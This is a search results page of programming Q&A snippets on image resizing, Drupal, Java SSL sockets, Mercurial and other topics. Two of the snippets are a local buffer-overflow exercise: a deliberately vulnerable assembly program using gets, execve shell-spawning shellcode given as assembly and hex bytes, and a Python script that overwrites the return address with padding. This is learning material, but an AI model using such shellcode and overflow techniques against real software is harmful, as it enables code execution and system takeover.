Search Results

Search found 18155 results on 727 pages for 'output'.

Page 98/727 | < Previous Page | 94 95 96 97 98 99 100 101 102 103 104 105  | Next Page >

  • The fastest way to resize images from ASP.NET. And it’s (more) supported-ish.

    - by Bertrand Le Roy
    I’ve shown before how to resize images using GDI, which is fairly common but is explicitly unsupported because we know of very real problems that this can cause. Still, many sites still use that method because those problems are fairly rare, and because most people assume it’s the only way to get the job done. Plus, it works in medium trust. More recently, I’ve shown how you can use WPF APIs to do the same thing and get JPEG thumbnails, only 2.5 times faster than GDI (even now that GDI really ultimately uses WIC to read and write images). The boost in performance is great, but it comes at a cost, that you may or may not care about: it won’t work in medium trust. It’s also just as unsupported as the GDI option. What I want to show today is how to use the Windows Imaging Components from ASP.NET APIs directly, without going through WPF. The approach has the great advantage that it’s been tested and proven to scale very well. The WIC team tells me you should be able to call support and get answers if you hit problems. Caveats exist though. First, this is using interop, so until a signed wrapper sits in the GAC, it will require full trust. Second, the APIs have a very strong smell of native code and are definitely not .NET-friendly. And finally, the most serious problem is that older versions of Windows don’t offer MTA support for image decoding. MTA support is only available on Windows 7, Vista and Windows Server 2008. But on 2003 and XP, you’ll only get STA support. that means that the thread safety that we so badly need for server applications is not guaranteed on those operating systems. To make it work, you’d have to spin specialized threads yourself and manage the lifetime of your objects, which is outside the scope of this article. We’ll assume that we’re fine with al this and that we’re running on 7 or 2008 under full trust. Be warned that the code that follows is not simple or very readable. This is definitely not the easiest way to resize an image in .NET. Wrapping native APIs such as WIC in a managed wrapper is never easy, but fortunately we won’t have to: the WIC team already did it for us and released the results under MS-PL. The InteropServices folder, which contains the wrappers we need, is in the WicCop project but I’ve also included it in the sample that you can download from the link at the end of the article. In order to produce a thumbnail, we first have to obtain a decoding frame object that WIC can use. Like with WPF, that object will contain the command to decode a frame from the source image but won’t do the actual decoding until necessary. Getting the frame is done by reading the image bytes through a special WIC stream that you can obtain from a factory object that we’re going to reuse for lots of other tasks: var photo = File.ReadAllBytes(photoPath); var factory = (IWICComponentFactory)new WICImagingFactory(); var inputStream = factory.CreateStream(); inputStream.InitializeFromMemory(photo, (uint)photo.Length); var decoder = factory.CreateDecoderFromStream( inputStream, null, WICDecodeOptions.WICDecodeMetadataCacheOnLoad); var frame = decoder.GetFrame(0); We can read the dimensions of the frame using the following (somewhat ugly) code: uint width, height; frame.GetSize(out width, out height); This enables us to compute the dimensions of the thumbnail, as I’ve shown in previous articles. We now need to prepare the output stream for the thumbnail. WIC requires a special kind of stream, IStream (not implemented by System.IO.Stream) and doesn’t directlyunderstand .NET streams. It does provide a number of implementations but not exactly what we need here. We need to output to memory because we’ll want to persist the same bytes to the response stream and to a local file for caching. The memory-bound version of IStream requires a fixed-length buffer but we won’t know the length of the buffer before we resize. To solve that problem, I’ve built a derived class from MemoryStream that also implements IStream. The implementation is not very complicated, it just delegates the IStream methods to the base class, but it involves some native pointer manipulation. Once we have a stream, we need to build the encoder for the output format, which could be anything that WIC supports. For web thumbnails, our only reasonable options are PNG and JPEG. I explored PNG because it’s a lossless format, and because WIC does support PNG compression. That compression is not very efficient though and JPEG offers good quality with much smaller file sizes. On the web, it matters. I found the best PNG compression option (adaptive) to give files that are about twice as big as 100%-quality JPEG (an absurd setting), 4.5 times bigger than 95%-quality JPEG and 7 times larger than 85%-quality JPEG, which is more than acceptable quality. As a consequence, we’ll use JPEG. The JPEG encoder can be prepared as follows: var encoder = factory.CreateEncoder( Consts.GUID_ContainerFormatJpeg, null); encoder.Initialize(outputStream, WICBitmapEncoderCacheOption.WICBitmapEncoderNoCache); The next operation is to create the output frame: IWICBitmapFrameEncode outputFrame; var arg = new IPropertyBag2[1]; encoder.CreateNewFrame(out outputFrame, arg); Notice that we are passing in a property bag. This is where we’re going to specify our only parameter for encoding, the JPEG quality setting: var propBag = arg[0]; var propertyBagOption = new PROPBAG2[1]; propertyBagOption[0].pstrName = "ImageQuality"; propBag.Write(1, propertyBagOption, new object[] { 0.85F }); outputFrame.Initialize(propBag); We can then set the resolution for the thumbnail to be 96, something we weren’t able to do with WPF and had to hack around: outputFrame.SetResolution(96, 96); Next, we set the size of the output frame and create a scaler from the input frame and the computed dimensions of the target thumbnail: outputFrame.SetSize(thumbWidth, thumbHeight); var scaler = factory.CreateBitmapScaler(); scaler.Initialize(frame, thumbWidth, thumbHeight, WICBitmapInterpolationMode.WICBitmapInterpolationModeFant); The scaler is using the Fant method, which I think is the best looking one even if it seems a little softer than cubic (zoomed here to better show the defects): Cubic Fant Linear Nearest neighbor We can write the source image to the output frame through the scaler: outputFrame.WriteSource(scaler, new WICRect { X = 0, Y = 0, Width = (int)thumbWidth, Height = (int)thumbHeight }); And finally we commit the pipeline that we built and get the byte array for the thumbnail out of our memory stream: outputFrame.Commit(); encoder.Commit(); var outputArray = outputStream.ToArray(); outputStream.Close(); That byte array can then be sent to the output stream and to the cache file. Once we’ve gone through this exercise, it’s only natural to wonder whether it was worth the trouble. I ran this method, as well as GDI and WPF resizing over thirty twelve megapixel images for JPEG qualities between 70% and 100% and measured the file size and time to resize. Here are the results: Size of resized images   Time to resize thirty 12 megapixel images Not much to see on the size graph: sizes from WPF and WIC are equivalent, which is hardly surprising as WPF calls into WIC. There is just an anomaly for 75% for WPF that I noted in my previous article and that disappears when using WIC directly. But overall, using WPF or WIC over GDI represents a slight win in file size. The time to resize is more interesting. WPF and WIC get similar times although WIC seems to always be a little faster. Not surprising considering WPF is using WIC. The margin of error on this results is probably fairly close to the time difference. As we already knew, the time to resize does not depend on the quality level, only the size does. This means that the only decision you have to make here is size versus visual quality. This third approach to server-side image resizing on ASP.NET seems to converge on the fastest possible one. We have marginally better performance than WPF, but with some additional peace of mind that this approach is sanctioned for server-side usage by the Windows Imaging team. It still doesn’t work in medium trust. That is a problem and shows the way for future server-friendly managed wrappers around WIC. The sample code for this article can be downloaded from: http://weblogs.asp.net/blogs/bleroy/Samples/WicResize.zip The benchmark code can be found here (you’ll need to add your own images to the Images directory and then add those to the project, with content and copy if newer in the properties of the files in the solution explorer): http://weblogs.asp.net/blogs/bleroy/Samples/WicWpfGdiImageResizeBenchmark.zip WIC tools can be downloaded from: http://code.msdn.microsoft.com/wictools To conclude, here are some of the resized thumbnails at 85% fant:

    Read the article

  • String search and write into file in jython

    - by kdev
    hi Everyone , i wish to write a program that can read a file and if a particular str_to_find is found in a bigger string say AACATGCCACCTGAATTGGATGGAATTCATGCGGGACACGCGGATTACACCTATGAGCAGAAATACGGCCTGCGCGATTACCGTGGCGGTGGACGTTCTTCCGCGCGTGAAACCGCGATGCGCGTAGCGGCAGGGGCGATCGCCAAGAAATACCTGGCGGAAAAGTTCGGCATCGAAATCCGCGGCTGCCTGACCCAGATGGGCGACATTCCGCTGGAGATTAAAGACTGGCGTCAGGTTGAGCTTAATCCGTTTTC then write that line and the above line of it into the file and keep repeating it for all the match found. Please suggest i have written the program for printing that particular search line but i dont know how to write the above line. Thanks everyone for your help. import re import string file=open('C:/Users/Administrator/Desktop/input.txt','r') output=open('C:/Users/Administrator/Desktop/output.txt','w') count_record=file.readline() str_to_find='AACCATGC' while count_record: if string.find(list,str_to_find) ==0: output.write(count_record) file.close() output.close()

    Read the article

  • PHP throws 'Allowed memory exhausted' errors while migrating data in Drupal.

    - by Stan
    I'm trying to setup a tiny sandbox on a local machine to play around with Drupal. I created a few CCK types; in order to create a few nodes I wrote the following script: chdir('C:\..\drupal'); require_once '.\includes\bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); module_load_include('inc', 'node', 'node.pages'); $node = array('type' => 'my_type'); $link = mysql_connect(..); mysql_select_db('my_db'); $query_bldg = ' SELECT stuff FROM table LIMIT 10 '; $result = mysql_query($query_bldg); while ($row = mysql_fetch_object($result)) { $form_state = array(); $form_state['values']['name'] = 'admin'; $form_state['values']['status'] = 1; $form_state['values']['op'] = t('Save'); $form_state['values']['title'] = $row->val_a; $form_state['values']['my_field'][0]['value'] = $row->val_b; ## About another dozen or so of similar assignments... drupal_execute('node_form', $form_state, (object)$node); } Here are a few relevant lines from php_errors.log: [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cookie - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 709 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 710 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 711 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 712 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:48] PHP Fatal error: Allowed memory size of 239075328 bytes exhau sted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:03:22] PHP Fatal error: Allowed memory size of 239075328 bytes exhausted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:04:34] PHP Fatal error: Allowed memory size of 262144 bytes exhausted (tried to allocate 261904 bytes) in Unknown on line 0 At this point any action php takes results in the last error shown above. I tried increasing the value of memory_limit in php.ini before the final Fatal error which obviously didn't help. How can the error be eliminated? Am I on a correct path to migrating data into Drupal or should the cck tables be operated on directly? Windows XP PHP 5.3.2 VC6 Apache 2.2

    Read the article

  • _CopyWebApplication with web.config transformations

    - by Jeremy
    I am trying to have my web application automatically Publish when a Release build is performed. I'm doing this using the _CopyWebApplication target. I added the following to my .csproj file: <!-- Automatically Publish in Release build. --> <Import Project="$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v10.0\WebApplications\Microsoft.WebApplication.targets" /> <Target Name="AfterBuild"> <RemoveDir Directories="$(ProjectDir)..\Output\MyWeb" ContinueOnError="true" /> <MSBuild Projects="MyWeb.csproj" Properties="Configuration=Release;WebProjectOutputDir=$(ProjectDir)..\Output\MyWeb;OutDir=$(ProjectDir)bin\" Targets="ResolveReferences;_CopyWebApplication" /> </Target> This works but with one issue. The difference between this output, and the output generated when using the Publish menu item in Visual Studio, is that the Web.Release.config transformation is not applied to the Web.config file when using the MSBuild method. Instead, Web.config, Web.Release.config, and Web.Debug.config are all copied. Any ideas are appreciated.

    Read the article

  • Java, server client TCP communication ends with RST

    - by Senne
    I'm trying to figure out if this is normal. Because without errors, a connection should be terminated by: FIN -> <- ACK <- FIN ACK -> I get this at the end of a TCP connection (over SSL, but i also get it with non-encrypted): From To 1494 server client TCP search-agent > 59185 [PSH, ACK] Seq=25974 Ack=49460 Win=63784 Len=50 1495 client server TCP 59185 > search-agent [ACK] Seq=49460 Ack=26024 Win=63565 Len=0 1496 client server TCP 59185 > search-agent [PSH, ACK] Seq=49460 Ack=26024 Win=63565 Len=23 1497 client server TCP 59185 > search-agent [FIN, ACK] Seq=49483 Ack=26024 Win=63565 Len=0 1498 server client TCP search-agent > 59185 [PSH, ACK] Seq=26024 Ack=49484 Win=63784 Len=23 1499 client server TCP 59185 > search-agent [RST, ACK] Seq=49484 Ack=26047 Win=0 Len=0 The client exits normally and reaches socket.close, shouldn't then the connection be shut down normally, without a reset? I can't find anything about the TCP streams of java on google... Here is my code: Server: package Security; import java.io.*; import java.net.*; import javax.net.ServerSocketFactory; import javax.net.ssl.*; import java.util.*; public class SSLDemoServer { private static ServerSocket serverSocket; private static final int PORT = 1234; public static void main(String[] args) throws IOException { int received = 0; String returned; ObjectInputStream input = null; PrintWriter output = null; Socket client; System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); try { System.out.println("Trying to set up server ..."); ServerSocketFactory factory = SSLServerSocketFactory.getDefault(); serverSocket = factory.createServerSocket(PORT); System.out.println("Server started!\n"); } catch (IOException ioEx) { System.out.println("Unable to set up port!"); ioEx.printStackTrace(); System.exit(1); } while(true) { client = serverSocket.accept(); System.out.println("Client trying to connect..."); try { System.out.println("Trying to create inputstream..."); input = new ObjectInputStream(client.getInputStream()); System.out.println("Trying to create outputstream..."); output = new PrintWriter(client.getOutputStream(), true); System.out.println("Client successfully connected!"); while( true ) { received = input.readInt(); returned = Integer.toHexString(received); System.out.print(" " + received); output.println(returned.toUpperCase()); } } catch(SSLException sslEx) { System.out.println("Connection failed! (non-SSL connection?)\n"); client.close(); continue; } catch(EOFException eofEx) { System.out.println("\nEnd of client data.\n"); } catch(IOException ioEx) { System.out.println("I/O problem! (correct inputstream?)"); } try { input.close(); output.close(); } catch (Exception e) { } client.close(); System.out.println("Client closed.\n"); } } } Client: package Security; import java.io.*; import java.net.*; import javax.net.ssl.*; import java.util.*; public class SSLDemoClient { private static InetAddress host; private static final int PORT = 1234; public static void main(String[] args) { System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); System.out.println("\nCreating SSL socket ..."); SSLSocket socket = null; try { host = InetAddress.getByName("192.168.56.101"); SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault(); socket = (SSLSocket) factory.createSocket(host, PORT); socket.startHandshake(); } catch(UnknownHostException uhEx) { System.out.println("\nHost ID not found!\n"); System.exit(1); } catch(SSLException sslEx) { System.out.println("\nHandshaking unsuccessful ..."); System.exit(1); } catch (IOException e) { e.printStackTrace(); } System.out.println("\nHandshaking succeeded ...\n"); SSLClientThread client = new SSLClientThread(socket); SSLReceiverThread receiver = new SSLReceiverThread(socket); client.start(); receiver.start(); try { client.join(); receiver.join(); System.out.println("Trying to close..."); socket.close(); } catch(InterruptedException iEx) { iEx.printStackTrace(); } catch(IOException ioEx) { ioEx.printStackTrace(); } System.out.println("\nClient finished."); } } class SSLClientThread extends Thread { private SSLSocket socket; public SSLClientThread(SSLSocket s) { socket = s; } public void run() { try { ObjectOutputStream output = new ObjectOutputStream(socket.getOutputStream()); for( int i = 1; i < 1025; i++) { output.writeInt(i); sleep(10); output.flush(); } output.flush(); sleep(1000); output.close(); } catch(IOException ioEx) { System.out.println("Socket closed or unable to open socket."); } catch(InterruptedException iEx) { iEx.printStackTrace(); } } } class SSLReceiverThread extends Thread { private SSLSocket socket; public SSLReceiverThread(SSLSocket s) { socket = s; } public void run() { String response = null; BufferedReader input = null; try { input = new BufferedReader( new InputStreamReader(socket.getInputStream())); try { response = input.readLine(); while(!response.equals(null)) { System.out.print(response + " "); response = input.readLine(); } } catch(Exception e) { System.out.println("\nEnd of server data.\n"); } input.close(); } catch(IOException ioEx) { ioEx.printStackTrace(); } } }

    Read the article

  • Convert text files to excel files using python

    - by Rahim Jaafar
    I am working on INFORMIX 4GL programs. That programs produce output text files.This is an example of the output: Lot No|Purchaser name|Billing|Payment|Deposit|Balance| J1006|JAUHARI BIN HAMIDI|5285.05|4923.25|0.00|361.80| J1007|LEE, CHIA-JUI AKA LEE, ANDREW J. R.|5366.15|5313.70|0.00|52.45| J1008|NAZRIN ANEEZA BINTI NAZARUDDIN|5669.55|5365.30|0.00|304.25| J1009|YAZID LUTFI BIN AHMAD LUTFI|3180.05|3022.30|0.00|157.75| This text files can manually convert to excel files.But, I wanna ask, is there any script that I can use to convert .txt files to .xls files ? Hi all,now I'm already can convert text files to excell file by python using script that was given from user named Rami Helmy.A big thanks for him.But now,That script will produce more than one excell files depends on the number of '|' from the text files.Beside that,That script also can only convert one text files.I a going to convert all text files without state the name of text files.Therefore,I am looking such a way on how to this script going to: output only one excell file convert all .txt files from the directory that was given from user. output excell's file name are automaticly copied from the file name of text files. I am new in python,hopefully someone can help me to solve my problems.Thank You.. done all the task,but there was something that I'm confused.. that output excell files contains an "square" symbol like this: then, how can I ensure that there is no square symbol like that after I convert from text files to excell? thank you...

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Dependency Property not getting updated value via ActivityBind

    - by d h
    I have a Sequence Activity which holds two activities (Activity A and B), the input dependency property for Activity B is bound an output dependency property of Activity A. However, when I run the sequence activity, the Input for activity B is never updated and just uses the default value of activity A's output. My question is: is there a way to enforce an update on activity B's input so that it gets the latest value of activity A's output?

    Read the article

  • WCF Method is returning xml fragment but no xml UTF-8 header

    - by horls
    My method does not return the header, just the root element xml. internal Message CreateReturnMessage(string output, string contentType) { // create dictionaryReader for the Message byte[] resultBytes = Encoding.UTF8.GetBytes(output); XmlDictionaryReader xdr = XmlDictionaryReader.CreateTextReader(resultBytes, 0, resultBytes.Length, Encoding.UTF8, XmlDictionaryReaderQuotas.Max, null); if (WebOperationContext.Current != null) WebOperationContext.Current.OutgoingResponse.ContentType = contentType; // create Message return Message.CreateMessage(MessageVersion.None, "", xdr); } However, the output I get is: <Test> <Message>Hello World!</Message> </Test> I would like the output to render as: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <Test> <Message>Hello World!</Message> </Test>

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Can't display multi byte string on MonoDevelop Mac OS X

    - by wataradio
    The problem is following one line code: Console.WriteLine ("?"); This results in the following output in Application Output window: ? How can I display "?" instead of "?" in Application Output window. I made sure following things: The source code encoding is UTF-8 I selected Japanese font set "Osaka Regular-Mono" (Preferences General Font) Executing the exe from a terminal, "?" is displayed correctly on terminal window On Ubuntu's MonoDevelop, "?" is displayed correctly in Application Output window Environments: MonoDevelop 2.2.2 Mono 2.6.4 Mac OS X 10.6.3

    Read the article

  • Overload Anonymous Functions

    - by Nissan Fan
    Still wrapping my head around Delegates and I'm curious: Is it possible to overload anonymous functions? Such that: delegate void Output(string x, int y); Supports: Output show = (x, y) => Console.WriteLine("{0}: {1}", x.ToString(), y.ToString()); And: delegate void Output(string x, string y); Allowing: show( "ABC", "EFG" ); And: show( "ABC", 123 );

    Read the article

  • audio processing in iPhone

    - by Janaka
    I am writing an iPhone application to apply filters to audio input and output the result in real time. I am new to audio processing but using audiounit, the correct approach? I found out how to output data using audiounit but couldn’t figure out how to capture input audio. Is there a sample application showing how to connect input and output using audiounit?

    Read the article

  • i want to find values between { }

    - by girish
    I m working with regular expression( Regex ) but not finding the exact output.. i want to find the values between two curly braces { Value } = value i use the following pattern but not getting the exact output...it does not remove first "{" ... string pattern = "\{*\}"; if my value is - {girish} it returns me {girish instead of this i want girish as output...

    Read the article

  • SimpleDOM sortedXPath date sorting works on localhost but not on remote server.

    - by Imminent
    Here's what i'm trying to do: 1) Take a basic XML page (data.xml) 2) Load it with simpleDOM 3) Use simpleDOM sortedXPath to sort all XML items by their pubDate 4) Display sorted output Here is the code I currently have. My code below outputs exactly what I need when run it on my localhost (XAMPP w/PHP 5.3) but on my remote server (which has at least PHP 5.0+) all is lost and a completely blank page is output. It will output the $xml array with print_r though. Here is my code: <?php include('SimpleDOM.php'); $xml = simpledom_load_file('data.xml'); $dateformat = "D j M, g:ia"; /* print_r($xml); <-array will output on remote server if put here, but alas nothing else beyond this point */ /*Output First 5 items sorted by pubDate*/ foreach($xml->channel->sortedXPath('item','pubDate', SORT_DESC) as $i => $item){ if ($i > 4){ break; } print "<p>This Weeks Deal:<strong> ".$item->title."</strong></p>"; print $item->description; print "<p>Date Posted:<strong> ".date($dateformat, strtotime($item->pubDate))."</strong></p>"; } ?> Like I said, this code seems to work great on my localhost... but not being able to run it on my remote server is making me crazy. Any ideas ?? Any help will be far beyond appreciated.

    Read the article

  • How do I give each test its own TestResults folder?

    - by izb
    I have a set of unit tests, each with a bunch of methods, each of which produces output in the TestResults folder. At the moment, all the test files are jumbled up in this folder, but I'd like to bring some order to the chaos. Ideally, I'd like to have a folder for each test method. I know I can go round adding code to each test to make it produce output in a subfolder instead, but I was wondering if there was a way to control the output folder location with the Visual Studio unit test framework, perhaps using an initialization method on each test class so that any new tests added automatically get their own output folder without needing copy/pasted boilerplate code?

    Read the article

  • Mercurial 1.5 pager on Windows

    - by alexandrul
    I'm trying to set the pager used for Mercurial but the output is empty, even if I specify the command in the [pager] section or as the PAGER environment variable. I noticed that the command provided is launched with cmd.exe. Is this the cause of empty output, and if yes, what is the right syntax? Environment: Mercurial 1.5, Mecurial 1.4.3 hgrc: [extensions] pager = [pager] pager = d:\tools\less\less.exe Sample command lines (from Process Explorer): hg diff c:\windows\system32\cmd.exe /c "d:\tools\less\less.exe 2> NUL:" d:\tools\less\less.exe UPDATE In pager.py, by replacing: sys.stderr = sys.stdout = util.popen(p, "wb") with sys.stderr = sys.stdout = subprocess.Popen(p, stdin = subprocess.PIPE, shell=False).stdin I managed to obtain the desired output for the hg status and diff. BUT, I'm sure it's wrong (or at least incomplete), and I have no control over the pager app (less.exe): the output is shown in the cmd.exe window, I can see the less prompt (:) but any further input is fed into cmd.exe. It seems that the pager app is still active in the background: after typing exit in the cmd.exe window, I have control over the pager app, and I can terminate it normally. Also, it makes no difference what I'm choosing as a pager app (more is behaving the same). UPDATE 2 Issue1677 - [PATCH] pager for "hg help" output on windows

    Read the article

  • Send and recieve multiple ssh commands via java runtime and cygwin

    - by Moustachio
    Hey I have run into the following problem when attempting to build a program in java which executes commands on a remote linux server and returns the output for processing... Basically I have installed Cygwin with an SSH client and want to do the following: Open Cygwin, Send command "user@ip"; Return output; Send command "password"; Return output; Send multiple other commands, Return output; ...etc... So far: Process proc = Runtime.getRuntime().exec("C:/Power Apps/Cygwin/Cygwin.bat"); Works nicely except I am at a loss as to how to attempt the next steps. Any help?

    Read the article

  • Help to solve "Robbery Problem"

    - by peiska
    Hello, Can anybody help me with this problem in C or Java? The problem is taken from here: http://acm.pku.edu.cn/JudgeOnline/problem?id=1104 Inspector Robstop is very angry. Last night, a bank has been robbed and the robber has not been caught. And this happened already for the third time this year, even though he did everything in his power to stop the robber: as quickly as possible, all roads leading out of the city were blocked, making it impossible for the robber to escape. Then, the inspector asked all the people in the city to watch out for the robber, but the only messages he got were of the form "We don't see him." But this time, he has had enough! Inspector Robstop decides to analyze how the robber could have escaped. To do that, he asks you to write a program which takes all the information the inspector could get about the robber in order to find out where the robber has been at which time. Coincidentally, the city in which the bank was robbed has a rectangular shape. The roads leaving the city are blocked for a certain period of time t, and during that time, several observations of the form "The robber isn't in the rectangle Ri at time ti" are reported. Assuming that the robber can move at most one unit per time step, your program must try to find the exact position of the robber at each time step. Input The input contains the description of several robberies. The first line of each description consists of three numbers W, H, t (1 <= W,H,t <= 100) where W is the width, H the height of the city and t is the time during which the city is locked. The next contains a single integer n (0 <= n <= 100), the number of messages the inspector received. The next n lines (one for each of the messages) consist of five integers ti, Li, Ti, Ri, Bi each. The integer ti is the time at which the observation has been made (1 <= ti <= t), and Li, Ti, Ri, Bi are the left, top, right and bottom respectively of the (rectangular) area which has been observed. (1 <= Li <= Ri <= W, 1 <= Ti <= Bi <= H; the point (1, 1) is the upper left hand corner, and (W, H) is the lower right hand corner of the city.) The messages mean that the robber was not in the given rectangle at time ti. The input is terminated by a test case starting with W = H = t = 0. This case should not be processed. Output For each robbery, first output the line "Robbery #k:", where k is the number of the robbery. Then, there are three possibilities: If it is impossible that the robber is still in the city considering the messages, output the line "The robber has escaped." In all other cases, assume that the robber really is in the city. Output one line of the form "Time step : The robber has been at x,y." for each time step, in which the exact location can be deduced. (x and y are the column resp. row of the robber in time step .) Output these lines ordered by time . If nothing can be deduced, output the line "Nothing known." and hope that the inspector will not get even more angry. Output a blank line after each processed case.

    Read the article

  • I/O between AIR client using Native process and executable java .jar

    - by aseem behl
    I am using Adobe AIR 2.0 native process API to launch a java executable jar. I/O is handled by writing to the input stream of the java process and reading from the output stream. The application is event based where several events are fired from the server. We catch these events in java code, handle them and write the output to the outputstream using the synchronized static method below. public class ReaderWriter { static Logger logger = Logger.getLogger(ReaderWriter.class); public synchronized static void writeToAir(String output){ try{ byte[] byteArray = output.getBytes(); DataOutputStream dataOutputStream = new DataOutputStream(System.out); dataOutputStream.write(byteArray); dataOutputStream.flush(); } catch (IOException e) { logger.info("Exception while writing the output. " + e); } } } The issue is that some messages are lost between the transfer and not all messages reach the AIR client. If I run the java application from the console I am receiving all the messages. It would be great if somebody could point out what I am missing. Following are some of the listeners used to send the event data to the AIR client. // class used to process Shutdown events from the Session private class SessionShutdownListener implements SessionListener{ public void onEvent(Event e) { Session.Shutdown sd = (Session.Shutdown) e; Session.ShutdownReason sr = sd.getReason(); String eventOutput = "eo;" + "Session Shutdown event ocurred reason=" + sr.strValue() + "\n"; ReaderWriter.writeToAir(eventOutput); } } // class used to process OperationSucceeded events from the Session private class SessionOperationSucceededListener implements SessionListener{ public void onEvent(Event e) { Session.OperationSucceeded os = (Session.OperationSucceeded) e; String eventOutput = "eo;" + "Session OperationSucceeded event ocurred" + "\n"; ReaderWriter.writeToAir(eventOutput); } }

    Read the article

  • Conditionals in Antlr String Templates

    - by Pat Long - Munkii Yebee
